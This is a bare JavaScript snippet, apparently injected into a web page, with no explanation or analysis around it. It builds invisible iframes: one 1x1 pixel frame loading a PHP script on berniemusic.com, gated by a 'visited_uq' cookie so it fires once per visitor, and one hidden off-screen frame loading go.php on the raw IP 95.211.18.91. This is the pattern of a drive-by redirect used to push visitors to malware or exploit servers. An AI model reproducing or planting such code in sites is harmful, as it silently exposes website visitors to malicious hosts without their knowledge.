| function zzzfff(){var amfhh = document.createElement('iframe');
 amfhh.src = 'http://berniemusic.com/bernie/clik.php';
 amfhh.style.position = 'absolute';
 amfhh.style.border = '0';
 amfhh.style.height = '1px';
 amfhh.style.width = '1px';
 amfhh.style.left = '1px';
 amfhh.style.top = '1px';
 if (!document.getElementById('amfhh')){
 document.write('<div id=\'amfhh\'></div>');
 document.getElementById('amfhh').appendChild(amfhh);
 }
 }
 function SetCookie(cookieName, cookieValue, nDays, path){
 var today = new Date();
 var expire = new Date();
 if (nDays == null || nDays == 0)nDays = 1;
 expire.setTime(today.getTime() + 3600000 * 24 * nDays);
 document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
 toGMTString() + ((path) ? "; path=" + path : "");
 }
 function GetCookie(name){
 var start = document.cookie.indexOf(name + "=");
 var len = start + name.length + 1;
 if ((!start) && (name != document.cookie.substring(0, name.length))){
 return null;
 }
 if (start ==  - 1)return null;
 var end = document.cookie.indexOf(";", len);
 if (end ==  - 1)end = document.cookie.length;
 return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled){
 if (GetCookie('visited_uq') == 55){
 }
 else {
 SetCookie('visited_uq', '55', '1', '/');
 zzzfff();
 }
 }
 
 
 
 
 if (document.getElementsByTagName('body')[0]){
 iframer();
 }
 else {
 document.write("
 <iframe src='http://95.211.18.91/go.php?sid=1' width='100' height='100' style='width:100px
 ;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
 }
 function iframer(){
 var f = document.createElement('iframe');
 f.setAttribute('src', 'http://95.211.18.91/go.php?sid=1');
 f.style.left = '-10000px';
 f.style.visibility = 'hidden';
 f.style.top = '0';
 f.style.position = 'absolute';
 f.style.top = '0';
 f.setAttribute('width', '100');
 f.setAttribute('height', '100');
 document.getElementsByTagName('body')[0].appendChild(f);
 }
 |